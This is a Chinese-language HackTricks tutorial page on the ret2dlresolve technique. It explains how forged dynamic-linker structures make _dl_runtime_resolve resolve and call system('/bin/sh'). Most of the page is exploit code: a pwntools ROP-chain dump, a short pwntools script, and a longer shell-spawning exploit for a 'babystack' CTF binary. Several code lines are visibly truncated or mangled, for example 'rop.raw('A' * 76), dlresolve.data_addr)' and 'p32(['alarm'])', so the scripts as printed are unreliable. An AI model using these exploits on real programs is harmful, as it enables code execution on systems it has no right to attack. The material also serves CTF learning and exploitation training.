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正如在关于 GOT/PLTRelro 的页面中解释的,缺少完整 Relro 的二进制文件在第一次使用时会解析符号(如外部库的地址)。这种解析通过调用函数 _dl_runtime_resolve 发生。

_dl_runtime_resolve 函数从栈中获取对一些它需要的结构的引用,以便 解析 指定的符号。

因此,可以 伪造所有这些结构 以使动态链接解析请求的符号(如 system 函数),并使用配置的参数调用它(例如 system('/bin/sh'))。

通常,通过制作一个 初始 ROP 链来调用 read 在可写内存上伪造所有这些结构,然后将 结构 和字符串 '/bin/sh' 传递,以便它们被读取存储在已知位置,然后 ROP 链继续通过调用 _dl_runtime_resolve,使其 解析 system 的地址 在伪造的结构中,并 使用 $'/bin/sh' 的地址调用这个地址


如果没有 syscall gadgets(使用如 ret2syscallSROP 等技术),并且没有方法泄漏 libc 地址,这种技术特别有用。


- YouTube



  1. 在某个地方写入伪造的结构
  2. 设置 system 的第一个参数 ($rdi = &'/bin/sh')
  3. 在栈上设置调用 _dl_runtime_resolve 的结构地址
  4. 调用 _dl_runtime_resolve
  5. system 将被解析并以 '/bin/sh' 作为参数调用

根据 pwntools 文档,这就是 ret2dlresolve 攻击的样子:

context.binary = elf = ELF('amd64'))
>>> rop = ROP(elf)
>>> dlresolve = Ret2dlresolvePayload(elf, symbol="system", args=["echo pwned"])
>>>, dlresolve.data_addr) # do not forget this step, but use whatever function you like
>>> rop.ret2dlresolve(dlresolve)
>>> raw_rop = rop.chain()
>>> print(rop.dump())
0x0000:         0x400593 pop rdi; ret
0x0008:              0x0 [arg0] rdi = 0
0x0010:         0x400591 pop rsi; pop r15; ret
0x0018:         0x601e00 [arg1] rsi = 6299136
0x0020:      b'iaaajaaa' <pad r15>
0x0028:         0x4003f0 read
0x0030:         0x400593 pop rdi; ret
0x0038:         0x601e48 [arg0] rdi = 6299208
0x0040:         0x4003e0 [plt_init] system
0x0048:          0x15670 [dlresolve index]


纯 Pwntools

您可以在此处找到此技术的示例 包含对最终 ROP 链的非常好的解释,但这里是使用的最终利用代码:

from pwn import *

elf = context.binary = ELF('./vuln', checksec=False)
p = elf.process()
rop = ROP(elf)

# create the dlresolve object
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])

rop.raw('A' * 76), dlresolve.data_addr) # read to where we want to write the fake structures
rop.ret2dlresolve(dlresolve)     # call .plt and dl-resolve() with the correct, calculated reloc_offset

p.sendline(dlresolve.payload)    # now the read is called and we pass all the relevant structures in



# Code from
# This exploit is based off of:

from pwn import *

target = process('./babystack')

elf = ELF('babystack')

# Establish starts of various sections
bss = 0x804a020

dynstr = 0x804822c

dynsym = 0x80481cc

relplt = 0x80482b0

# Establish two functions

scanInput = p32(0x804843b)
resolve = p32(0x80482f0) #dlresolve address

# Establish size of second payload

payload1_size = 43

# Our first scan
# This will call read to scan in our fake entries into the plt
# Then return back to scanInput to re-exploit the bug

payload0 = ""

payload0 += "0"*44                        # Filler from start of input to return address
payload0 += p32(elf.symbols['read'])    # Return read
payload0 += scanInput                    # After the read call, return to scan input
payload0 += p32(0)                        # Read via stdin
payload0 += p32(bss)                    # Scan into the start of the bss
payload0 += p32(payload1_size)            # How much data to scan in


# Our second scan
# This will be scanned into the start of the bss
# It will contain the fake entries for our ret_2_dl_resolve attack

# Calculate the r_info value
# It will provide an index to our dynsym entry
dynsym_offset = ((bss + 0xc) - dynsym) / 0x10
r_info = (dynsym_offset << 8) | 0x7

# Calculate the offset from the start of dynstr section to our dynstr entry
dynstr_index = (bss + 28) - dynstr

paylaod1 = ""

# Our .rel.plt entry
paylaod1 += p32(['alarm'])
paylaod1 += p32(r_info)

# Empty
paylaod1 += p32(0x0)

# Our dynsm entry
paylaod1 += p32(dynstr_index)
paylaod1 += p32(0xde)*3

# Our dynstr entry
paylaod1 += "system\x00"

# Store "/bin/sh" here so we can have a pointer ot it
paylaod1 += "/bin/sh\x00"


# Our third scan, which will execute the ret_2_dl_resolve
# This will just call 0x80482f0, which is responsible for calling the functions for resolving
# We will pass it the `.rel.plt` index for our fake entry
# As well as the arguments for system

# Calculate address of "/bin/sh"
binsh_bss_address = bss + 35

# Calculate the .rel.plt offset
ret_plt_offset = bss - relplt

paylaod2 = ""

paylaod2 += "0"*44
paylaod2 += resolve                 # 0x80482f0
paylaod2 += p32(ret_plt_offset)        # .rel.plt offset
paylaod2 += p32(0xdeadbeef)            # The next return address after 0x80482f0, really doesn't matter for us
paylaod2 += p32(binsh_bss_address)    # Our argument, address of "/bin/sh"


# Enjoy the shell!



学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)

支持 HackTricks